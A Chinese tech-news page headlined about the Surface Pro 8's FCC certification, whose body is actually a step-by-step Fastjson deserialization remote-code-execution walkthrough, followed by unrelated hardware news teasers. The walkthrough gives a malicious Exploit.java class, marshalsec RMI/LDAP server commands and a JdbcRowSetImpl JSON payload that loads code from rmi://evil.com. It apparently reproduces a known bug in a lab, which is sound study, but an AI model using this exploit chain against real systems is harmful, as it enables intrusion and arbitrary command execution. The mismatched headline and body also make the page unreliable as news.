2. 程式人生 > 資訊 >即將釋出,訊息稱微軟 Win11 筆記本 Surface Pro 8 通過美國 FCC 認證:支援英特爾 WiFi 6

即將釋出,訊息稱微軟 Win11 筆記本 Surface Pro 8 通過美國 FCC 認證:支援英特爾 WiFi 6

阿新 發佈:2021-09-14

一、參考連結

https://zeo.cool/2020/07/04/紅隊武器庫!fastjson小於1.2.68全漏洞RCE利用exp/

二、漏洞介紹

Fastjson是阿里巴巴公司開源的一款json解析器,其效能優越,被廣泛應用於各大廠商的Java專案中。fastjson於1.2.24版本後增加了反序列化白名單,而在1.2.48以前的版本中,攻擊者可以利用特殊構造的json字串繞過白名單檢測,成功執行任意命令。

三、漏洞影響範圍

Fastjson < 1.2.68
Fastjson爆出的繞過方法可以通殺1.2.68版本以下所有

四、漏洞復現

以Fastjson1.2.24為例子,因為vulhub有現成的環境十分方便。

五、流程示意圖


主機A:存在fastjson反序列化漏洞的主機
主機C:為RMI/LDAP服務
主機B:為構造的惡意類(包含要執行的命令)
在整個遠端命令執行流程
1、黑客使用payload攻擊主機A(該payload需要指定rmi/ldap地址)
2、主機A引發反序列化漏洞,傳送了進行rmi遠端發放呼叫,去連線主機C
3、主機C的rmi服務指定載入主機B的惡意java類,所以主機A通過主機C的rmi服務最終載入並執行主機B的惡意java類
4、主機A引發惡意系統命令執行

六、復現流程

根據上圖流程和環境復現:
主機A: http://192.168.133.138:8090 (存在Fastjson漏洞主機)
主機B:

http://192.168.133.133:8888 (惡意java類服務)
主機C: rmi://192.168.133.133:9999 (遠端方法呼叫服務)
實際上主機B和C是一臺機器不同埠)

1、構造惡意方法

目標環境是openjdk:8u102,這個版本沒有com.sun.jndi.rmi.object.trustURLCodebase的限制,我們可以簡單利用RMI進行命令執行。
首先編譯並上傳命令執行程式碼
使用如下payload:
其中touch /zydx777為系統命令,可以根據自己需求隨意修改
注意該檔名叫Exploit.java固定格式不能變

import java.lang.Runtime;
import java.lang.Process;

public class Exploit{
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

在主機B中使用javac命令編譯Exploit.java檔案,生成一個Exploit.class檔案

javac Exploit.java

然後在主機B啟一個http服務,中介軟體隨意,但是需要能訪問到Exploit.class檔案,這裡使用python3臨時啟動一個

python3 -m http.server --bind 0.0.0.0 8888

2、開啟遠端方法呼叫rmi服務

接下來在主機C開啟rmi服務
可以使用RMI或者LDAP的服務,將reference result 重定向到web伺服器(即檔案Exploit.class的存放位置)

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.133.133:8888/#Exploit" 9999
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.133.133:8888/#Exploit" 9999

3、傳送payload

POST / HTTP/1.1
Host: 192.168.133.138:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/TouchFile",
        "autoCommit":true
    }
}

可見,命令touch /tmp/success已成功執行:

一隻小the bug

相關推薦

即將釋出訊息微軟 Win11 筆記本 Surface Pro 8 通過美國 FCC 認證支援 WiFi 6

9 月 14 日訊息據 Windows Latest 報道我們已經聽到了一些關於傳聞中的 Surface Pro 8Surface Go 3 的訊息,而且這些裝置似乎離上市又近了一步。微軟最近為一款“行動式計算裝置”申請了 FCC 認證,這很可能是

訊息微軟 Win11 筆記本 Surface Book 4 Studio 已通過美國 FCC 認證即將開售

9 月 22 日訊息 據 WBI 報道爆料人士稱,微軟將宣佈一款新的高階 Surface Book 4 Studio 筆記本,其螢幕不可拆卸可以像畫架一樣擺放。▲Surface Book 4 Studio 概念裝置就在微軟Surface 硬體活動前幾個小時

微軟 Win11 筆記本 Surface Pro 8 正式釋出搭載 13 英寸 120Hz 窄邊框顯示屏Intel 第 11 代 CPU雷電 4 介面

9 月 22 日訊息今天晚上,微軟舉行 Windows 11 及 Surface 新品釋出會。微軟正式釋出 Surface Pro 8,配備更大的 13 英寸 120Hz 顯示屏和 Thunderbolt 雷電介面技術這就是我們等待了多年的 Surface Pro微軟今天

2988 元至 18588 元微軟 Win11 筆記本 Surface Pro 8/Go 3 國行版開啟預售

10 月 12 日訊息今年 9 月底,微軟釋出了為Windows 11打造的全新 Surface 系列產品。微軟表示在 Windows 11 即將推出之際公佈了 Surface 家族有史以來最大的一次更新。憑藉 PixelSense 觸控顯示屏、新的觸控筆技

微軟 Win11 筆記本 Surface Pro 8 推送韌體更新改善觸控式螢幕提高圖形穩定性

11 月 24 日訊息據 MSPoweruser 報道最近微軟向 Windows 11 筆記本 Surface Pro 8 釋出了 2021 年 11 月的系統更新。這些更新還適用於執行 Windows 10 版本 2009(20H2 版本)或更高版本的 Surface Pro 8 裝置

微軟 Win11 筆記本 Surface Pro 8/Go 3 國行版將在 10 月 12 日開啟預售

10 月 9 日訊息 今年 9 月底,微軟釋出了為 Windows 11 打造的全新 Surface 系列產品。微軟表示在 Windows 11 即將推出之際公佈了 Surface 家族有史以來最大的一次更新。憑藉 PixelSense 觸控顯示屏、新的觸控筆

海思麒麟 9000 系列還有晶片訊息華為 Mate 40E Pro 2022 將搭載麒麟 9000L支援 5G

2 月 17 日訊息,去年 3 月華為宣佈全新的華為 Mate 40E 上線搭載麒麟 990E 晶片雖然相比Mate40 有所縮減但有效提高了 Mate 40 系列的出貨量。隨後沒多久網上就出現了傳聞海思將推出麒麟 9000L 晶片。今日

代號“太陽谷 2”訊息微軟 Win11 2022 正式版重大更新將在明年夏天釋出真正完成態執行安卓 App

12 月 31 日訊息,目前正在向符合條件的 Windows 10 使用者和新買家推出的 Windows 11 版本還有很多不足之處人們曾希望微軟在 2022 年初推出一個重大更新以解決這些不足之處。現在看來Windows 11 使用者將不得

榮耀首款摺疊屏旗艦手機 Magic V 即將釋出訊息維信諾、京東方供應螢幕主屏 8 英寸外部副屏 6.5 英寸

今日上午榮耀官方宣佈榮耀首款摺疊旗艦手機 Magic V 即將釋出。根據此前國內數碼博主爆料榮耀的左右摺疊屏機型的釋出時間暫定春節前其造型類似於華為 Mate X2;而上下摺疊屏機型可能會推遲到第二季度才釋出,

佳能新款 EOS R7 相機即將釋出訊息老款 EOS M6 Mark II 已停產

5 月 8訊息,據 Cannonrumors 訊息,其兩個國家的訊息稱,佳能 EOS M6 Mark II 相機已停產。這意味著EOS M 系統將被淘汰取而代之的是 RF 卡口的APS-C 相機系列。不久前CanonRumors 佳能全新APS-C 相機將

微軟宣佈 Win11 筆記本 Surface Pro 8 LTE Advanced 將在 2022 年上市13 英寸 120Hz 顯示屏Intel 第 11 代 CPU雷電 4 介面

9 月 28 日訊息9 月 22 日晚上,微軟舉行 Windows 11 及 Surface 新品釋出會。微軟正式釋出Surface Pro 8,配備更大的 13 英寸 120Hz 顯示屏和 Thunderbolt 雷電介面技術這就是我們等待了多年的 Surface Pro

Linux Kernel 5.12 穩定版釋出支援 Xe GPU 可變重新整理率索尼 PS5 手柄可用

4 月 27 日訊息LinusTorvalds 昨日釋出郵件宣佈LinuxKernel 5.12 在延遲一週後終於正式釋出

GPU-Z 2.42.0 版釋出支援 Alder Lake CPU可識別偉達 LHR 顯示卡

9 月 24 日訊息 TechPowerUp 今日釋出了 GPU-Z 2.42.0 正式版。這一顯示卡檢測工具可以識別眾多顯示卡引數資訊最新版新增了對於英特爾第 12 代酷睿 Alder Lake-S 處理器的支援,能夠準確識別出其搭載的銳炬 Xe 核

2744 元起三星 Galaxy Chromebook 2 360 筆記本美國開售搭載賽揚 N4500 處理器12.4 英寸 TFT 觸控式螢幕

4 月 16 日訊息,三星此前釋出了 Galaxy Chromebook 2 360是一款以教育為重點的 Chromebook 筆記本,現在面向美國市場開售429.99 美元(約 2743.34 元人民幣)起。三星新的 Chromebook 360 配備了 12.4 英寸 256

微星推出 Z690 系列主機板支援 12 代酷睿處理器全面升級 CPU 供電等

11 月 3 日訊息,昨日晚間微星在線上舉辦了新品釋出會介紹了新推出的 Z690 系列主機板還有新款主機、電競遊戲顯示器等新品。據介紹微星的 Z690 主機板分為 MEG、MPG 和 MAG 三大系列首發已上市的有兩款。

別再等 Win11 22H1 了訊息微軟下一個 Windows 11 大版本明年 10 月份釋出

12 月 6訊息,據 mspoweruser 報道在比較保守的 Windows 使用者中有一個長期的傳統即在升級到新的微軟作業系統之前通常會等待第一個服務包的釋出。其邏輯是第一波新使用者會遇到 Bug而更明智的使用者會

為什麼 Win11 ARM 不支援 M1 Mac訊息微軟與高通達成祕密獨家協議

11 月 23 日訊息,微軟拒絕為基於 Arm 架構的蘋果 M1、M1 Pro 和 M1 Max Mac 提供 Windows 11 版本現在我們可能知道了原因 —— 微軟與高通公司達成了一項祕密獨家協議。根據 XDA 開發者的說法由於兩家公司之前

蘋果 2022 第一場釋出會即將到來訊息第三代 iPhone SE 有望在 3 或 4 月釋出

1 月 9 日訊息,據彭博社古稱,蘋果已經在計劃 2022 年的第一場活動。他認為蘋果目前正在籌備三月或四月的一次釋出活動屆時將推出一款具有 5G 網路支援的 iPhone SE 機型。在最新一期的 Power On 時事通訊中

Win10 太陽谷更新介面大變訊息微軟將其稱為 “新 Windows”進行宣傳

2 月 27 日訊息據外媒 Windows Latest 報道,微軟正計劃公佈新版 Windows 10該公司可能會考慮將 Windows 10X 或太陽谷大升級作為 “新 Windows(the new Windows)”進行營銷。新版本的釋出日期仍不確定但預計至

繼續買買買訊息微軟將在 E3 公佈新收購的遊戲工作室和 IP

66訊息微軟(B 社)即將舉行 E3 釋出會現在各種訊息也在不斷流傳。